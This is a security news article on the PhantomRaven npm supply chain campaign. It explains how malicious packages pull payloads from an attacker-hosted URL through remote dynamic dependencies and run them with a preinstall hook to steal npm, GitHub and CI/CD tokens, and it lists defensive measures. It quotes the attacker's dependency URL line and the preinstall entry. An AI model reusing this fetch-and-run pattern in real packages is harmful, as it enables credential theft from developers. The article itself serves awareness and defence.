PhantomRaven npm supply chain attack – 126 malicious npm packages and hidden dependencies

The PhantomRaven campaign exploits hidden npm dependencies to spread malware.

The ongoing PhantomRaven npm supply chain attack is a sophisticated malware campaign targeting developers worldwide. Since August 2025 it has distributed 126 malicious npm packages that together have been downloaded more than 86,000 times. Its aim is to steal npm authentication tokens, GitHub login credentials and CI/CD secrets, and it uses advanced detection-evasion techniques to bypass most security tools.

Analysts at Koi Security identified the campaign in October 2025 when their behavior-monitoring system, Wings, flagged suspicious network activity during package installations. All of the malicious packages made outbound requests to the same domain, which revealed a coordinated, global operation.


How PhantomRaven npm supply chain attack works

The investigation by Koi researchers revealed a clear timeline. The first 21 packages were discovered and removed in August 2025. Shortly afterwards the attackers adapted their strategy and managed to publish a further 80 packages between September and October that completely evaded standard detection mechanisms. The attackers' infrastructure shows a contrast between technically advanced execution and surprisingly careless operational security.


To hide the malicious code, the attackers used a technique known as remote dynamic dependencies. npm allows a dependency to be defined by an HTTP URL instead of by a name and version in the npm registry, for example:
"ui-styles-pkg": "http://packages.storeartifact.com/ui-styles-pkg.tgz"
When such a package is installed, npm automatically fetches the external dependency without any security validation or transparency.

This means that the code that is uploaded to npmjs.com may look completely harmless – often just a “hello world” script – while the actual malicious payload is dynamically retrieved from the attacker’s server upon installation. In this way, PhantomRaven attackers bypass both static code analysis and dependency scanning.

Hidden dependencies and automatic execution

When the invisible dependency arrives on the victim's system, the malicious code is activated immediately through npm's lifecycle scripts. The manipulated package.json file contains a preinstall script, "preinstall": "node index.js", which runs automatically without the user's knowledge. It does not matter how deep in the dependency tree the package sits: any installation of a seemingly legitimate package can trigger the malicious execution.

The PhantomRaven npm supply chain attack thus exploits npm's inherent flexibility to deliver malicious code in real time. Since each installation fetches the dependency afresh from the attacker's server, the payload can also be tailored to the target environment, which makes the attack very difficult to detect and stop.

What the attackers collect

After a successful installation, PhantomRaven systematically collects email addresses from environment variables, .gitconfig files, .npmrc configurations and the author fields of package.json. It also exfiltrates CI/CD credentials, including GitHub Actions tokens, GitLab CI keys, Jenkins logins, CircleCI tokens and npm publish tokens.

The malware then performs full system profiling: the public IP address, hostname, operating system, Node.js version and network configuration are collected to distinguish corporate networks from individual developer machines. This information is used to identify valuable targets where the attackers can gain greater access or spread further.

Operational negligence and tracking

Despite the technical prowess, the infrastructure shows signs of operational negligence. Several email accounts were created sequentially at free services, from jpdtester01@hotmail.com to jpdtester13@gmail.com, and usernames such as npmhell and npmpackagejpd recur across multiple packages. This carelessness has allowed researchers to trace the campaign to a single actor, giving hope for future identification and prosecution.


Recommended protective measures

  1. Rotate all tokens and API keys (GitHub, npm, CI/CD) that may have been exposed.
  2. Review package.json files and identify any dependencies that reference HTTP URLs; block or remove them.
  3. Implement SBOM tools such as CycloneDX or SPDX to gain full visibility into dependencies and version history.
  4. Limit token permissions, use short-lived secrets, and enable automatic rotation.
  5. Introduce behavioral monitoring in CI/CD environments, such as sandbox analysis of new packages before they are deployed.
  6. Follow the OWASP Software Component Verification Standard (SCVS) for safe handling of third-party dependencies.
  7. Consider using private npm registries and validating dependencies before publishing to reduce the risk of manipulation in open ecosystems.

Analysis and importance for the industry

The growing scale of attacks such as PhantomRaven clearly shows how the dependency chain has become one of software's biggest vulnerabilities. As companies build on open source and thousands of third-party packages, the risk increases that a single compromised component will have huge consequences.

For IT organizations, this means that security is no longer just about networks or end users – it’s about the entire development chain. Secure code management, reliable dependencies, and continuous analysis of the supply chain become a strategic issue rather than a technical detail.

The campaign also shows that attackers have started to think like developers: they are exploiting existing features in tools like npm to spread malware in a way that looks completely legitimate. This requires a change in how companies monitor and verify their software.

For Swedish and Nordic companies, the event underlines the importance of building expertise in software supply chain security and of complying with international standards. Through proactive control, shared information and open collaboration, the industry can be better prepared for the next big attack.
